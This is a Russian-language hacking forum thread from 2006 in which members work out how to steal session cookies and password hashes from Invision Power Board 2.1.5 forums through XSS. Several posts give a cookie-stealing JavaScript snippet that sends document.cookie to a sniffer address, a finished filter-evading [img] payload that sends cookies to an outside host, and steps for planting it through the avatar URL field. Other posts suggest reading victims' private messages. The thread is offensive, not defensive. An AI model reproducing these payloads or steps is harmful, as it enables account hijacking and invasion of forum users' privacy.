Форумы Invision 2.1.5 Xss

Discussion in 'Уязвимости CMS/форумов' started by sexxx, 9 Apr 2006.

  1. sexxx

    sexxx New Member

    Joined:
    3 Apr 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вобшем как можно унать хэш на это версии движка,
    помню можно было через "жалобу" но вот работает ли эта шняга на этой версии не знаю, знал бы не спрашивал.
     
  2. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    а попробовать? не работает.
     
    1 person likes this.
  3. iNcluDe

    iNcluDe New Member

    Joined:
    7 Mar 2006
    Messages:
    9
    Likes Received:
    2
    Reputations:
    2
    Xss баг через репорт в 2.1.5 исправлен, он для 2.1.4
     
  4. sexxx

    sexxx New Member

    Joined:
    3 Apr 2006
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо буду знать, а не подскажете как нибудь там можно сваравать хэш, может сплойт есть. Знаю что гугл рулит, но всё так преятней узнать от знающих людей. ПРобывал сам поискать чтоб хэш cтырить, но что то не выходит.
     
  5. member_ru

    member_ru Elder - Старейшина

    Joined:
    8 Dec 2005
    Messages:
    46
    Likes Received:
    3
    Reputations:
    0
    sexxx, никак, пока XSSбаги там не нашли.
     
    1 person likes this.
  6. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Пока ничего такого нет. Версия ещё девственная. В смысле не поимел пока никто.
    Можно через аватарку попробовать вроде бы. Но это только под Ie.
     
  7. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    вместо пробелов в слове javascript надо поставить табулюцию. Работает под Ие и опера

    [​IMG]
     
    3 people like this.
  8. Noth!nG

    Noth!nG Elder - Старейшина

    Joined:
    8 Mar 2006
    Messages:
    31
    Likes Received:
    4
    Reputations:
    0
    Invision Power Board 2.1.5 до 2006-03-08 и версии до 2.1.x

    Наличие эксплоита: Нет

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.

    Уязвимость существует из-за недостаточной обработки входных данных в модуле PM. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

    P.S.: В инете искать пробовали?
     
  9. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Работает спасибо :)))
    а теперь после того как получил алерт что мне делать?
    заранее спасибо
     
  10. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    тебе ввобщем надо получить куки припомощи JavaScript.
    вот пример:

    <script>
    img = new Image();
    img.src = "http://адресс_снифера?"+document.cookie;
    </script>

    только теперь тебе это надо вставить в ту XSS. Скажу сразу что форум не воспринимает ",?,;, пробел. Тебе эти символы надо зашифровать с помощью http://ha.ckers.org/xss.html и немного до делать сам скрипт возможно =)
     
  11. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
  12. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Не понял вместо
    [​IMG]

    XSS вставить твой код? Тогда алерт заробает когда посетитель зайдет на ту страницу
    ???
     
  13. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Попробал вот это
    [​IMG]

    и вот что мне выдал
    Sorry, dynamic pages in the tags are not allowed

    вместо знака вопроса пробавл вот это %3F затем ? и это &#63
     
  14. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Там надо пропустить тебе через http://ha.ckers.org/xss.html вот эти символы:
    " пробел ; ' + ?
    возможно еще [ ]

    Хм... Ты не правильно меня понял... Я не имел ввиду вставить в алерт вместо слова XSS я имел вставить вместо алерта. Т.е. после слова javascript =)
     
    #14 CinerX, 12 Apr 2006
    Last edited by a moderator: 12 Apr 2006
  15. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Хмм.. Ну никак не удаётся протащить ? и ;
     
  16. Grrl

    Grrl Elder - Старейшина

    Joined:
    17 Jul 2004
    Messages:
    180
    Likes Received:
    54
    Reputations:
    29
    там хэши наскоко помню соленые так что толку от xss ...
     
  17. Otaku

    Otaku Elder - Старейшина

    Joined:
    24 Jul 2005
    Messages:
    279
    Likes Received:
    73
    Reputations:
    2
    Почитать внутренние форумы и личные мессаги. Ещё поиграться.
     
  18. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Ввобщем этой XSS был подвержен damagelab.org вот видео http://dreamshell.h16.ru/hack/damagelab.rar

    Как я вижу ни кто куки и не стырил припомощи этой XSS. Эх... Вот готовый код для тырки кук:
    Code:
    [im*g]j	a	v	a	s	c	r	i	p	t:x=document.cookie%3Bimg=new%20Image()%3Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/im*g]
    
    пояснение:
    1)вместо пробелов в слове javascript ставим табуляцию. 2)После img.src= убираем пробел.
    3)Этот код пашет токо под ИЕ.
    4)Убираем звездочки только с тегов [​IMG]

    ПС просьба репу добавлять CinerX, а не _CinerX
     
    #18 CinerX, 14 Apr 2006
    Last edited by a moderator: 14 Apr 2006
    1 person likes this.
  19. CinerX

    CinerX Elder - Старейшина

    Joined:
    13 Feb 2006
    Messages:
    81
    Likes Received:
    17
    Reputations:
    13
    Для Ipb 2.1.5:
    Заходим в профиль => смена аватары. Сохраняем страницу на винт редактируем, чтоб не было ограничений на ввод урла аватары. Ввобим код выши в поле грузить с урл и жмем сохранить аватару. Вот и все =)

    ПС репу поднимаем CinerX, а не _CinerX
     
  20. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    164
    Likes Received:
    18
    Reputations:
    5
    Sorry, that is not a valid file extension

    У меня не получаеться ничего (((